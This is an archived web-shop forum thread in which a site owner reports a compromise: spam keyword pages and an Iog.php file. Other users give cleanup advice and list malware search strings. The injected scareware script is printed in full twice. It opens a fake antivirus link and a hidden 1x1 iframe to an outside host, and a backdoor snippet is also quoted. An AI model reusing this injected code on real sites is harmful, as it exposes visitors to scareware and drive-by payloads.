natashome Posted December 13, 2009 Share Posted December 13, 2009 I wouldn't have noticed that my site was hacked if Google didn't sent me an email letting me know that he found some hidden keywords in my pages and it breaks their rules and some pages were taken of the index. I took a look at my FTP and in that particular domain indeed there were some extra files like this: 1. a folder named .xdata which contained at least 300 html files with weird names like: 790-sports-animal.com.html; 2010-heisman-odds.html; agua-bella.html and so on. These html files contained urls and keywords 2. a file named Iog.php which contained the following code: document.write('<div style="position: absolute; top: 0; left: 0; width: 100%; height: 4000px; background-color: #FFFFFF; padding: 0px">'); function go() { window.open("http://antyvirusservicenow.com/hitin.php?land=20&affid=34100"); } document.write('<center><table align=center cellpadding=0 cellspacing=0 style="border: 0px solid; border-color: #000000; width: 400px; height: 300px; padding: 30px; margin-top: 100px; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; color: #000000;"><tr><td><br><br><br><br><br><br><br><br><br><br><center><input type=submit name=klik id=klik value="-=ENTER=-" onclick="go();" style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 40px; color: red; font-weight: bold; width: 300px; height: 60px; border: 2px solid; cursor: pointer"></center></td></tr></table></center></font></div><iframe src="http://levitt-tupa-wkolota.freehostia.com/k.html" width="1" height="1"></iframe>'); 3. a logs file which again has a lot of links and keywords I deleted these 2 files and folder but they are created every time. I also changed the .xdata folder permissions to 444 but it still changes itself to 777. I couldn't find those keywords hidden in my pages at all. Anyone has any clue? Thanks Link to comment Share on other sites More sharing options...
spooks Posted December 13, 2009 Share Posted December 13, 2009 Ask the host to wipe the site then restore from last known clean backup, often the only way to be sure its all gone. Then add security http://www.oscommerce.com/forums/index.php?showtopic=313323 Sam Remember, What you think I ment may not be what I thought I ment when I said it. Contributions: Auto Backup your Database, Easy way Multi Images with Fancy Pop-ups, Easy way Products in columns with multi buy etc etc Disable any Category or Product, Easy way Secure & Improve your account pages et al. Link to comment Share on other sites More sharing options...
Jack_mcs Posted December 13, 2009 Share Posted December 13, 2009 Many times a hacker will hide a file somewhere deep within the site that can be used to restore his code so that may be what is happening. If they are being recreated after a time, it might be that the hacker is just getting back in. If youhad had the SiteMonitor addon installed (see My Addons), you would have known about this before google did. You should still install it and run the hacker test. It might help you locate such hidden files. Support Links: For Hire: Contact me for anything you need help with for your shop: upgrading, hosting, repairs, code written, etc. All of My Addons Get the latest versions of my addons Recommended SEO Addons Link to comment Share on other sites More sharing options...
melmelmel Posted August 31, 2010 Share Posted August 31, 2010 We had the same problem. In our case it was a file called hit.php that was in the root of the site creating and altering folder permissions. For the xdata issue, do a search on your entire site for any of these entries: /***********************\ | Private | | Coding by nsh | | mtDoor v.0.0.1 | \***********************/ @mkdir("./.xdata"); @chmod("./.xdata", 0777); We never were able to delete the xdata folder, but able to rename it and drop the permissions to 0444, after deleting the hit.php file. Doing a site wise search for 'preg_replace', 'base64_decode','<iframe', and 'eval' revealed a TON of malicious code injected in many places even above oscommerce store folder level. Any code on a page above oscommerce comment intro on the page doesn't belong there. Hope that info will be of help to someone. I wouldn't have noticed that my site was hacked if Google didn't sent me an email letting me know that he found some hidden keywords in my pages and it breaks their rules and some pages were taken of the index. I took a look at my FTP and in that particular domain indeed there were some extra files like this: 1. a folder named .xdata which contained at least 300 html files with weird names like: 790-sports-animal.com.html; 2010-heisman-odds.html; agua-bella.html and so on. These html files contained urls and keywords 2. a file named Iog.php which contained the following code: document.write('<div style="position: absolute; top: 0; left: 0; width: 100%; height: 4000px; background-color: #FFFFFF; padding: 0px">'); function go() { window.open("http://antyvirusservicenow.com/hitin.php?land=20&affid=34100"); } document.write('<center><table align=center cellpadding=0 cellspacing=0 style="border: 0px solid; border-color: #000000; width: 400px; height: 300px; padding: 30px; margin-top: 100px; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; color: #000000;"><tr><td><br><br><br><br><br><br><br><br><br><br><center><input type=submit name=klik id=klik value="-=ENTER=-" onclick="go();" style="font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 40px; color: red; font-weight: bold; width: 300px; height: 60px; border: 2px solid; cursor: pointer"></center></td></tr></table></center></font></div><iframe src="http://levitt-tupa-wkolota.freehostia.com/k.html" width="1" height="1"></iframe>'); 3. a logs file which again has a lot of links and keywords I deleted these 2 files and folder but they are created every time. I also changed the .xdata folder permissions to 444 but it still changes itself to 777. I couldn't find those keywords hidden in my pages at all. Anyone has any clue? Thanks Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.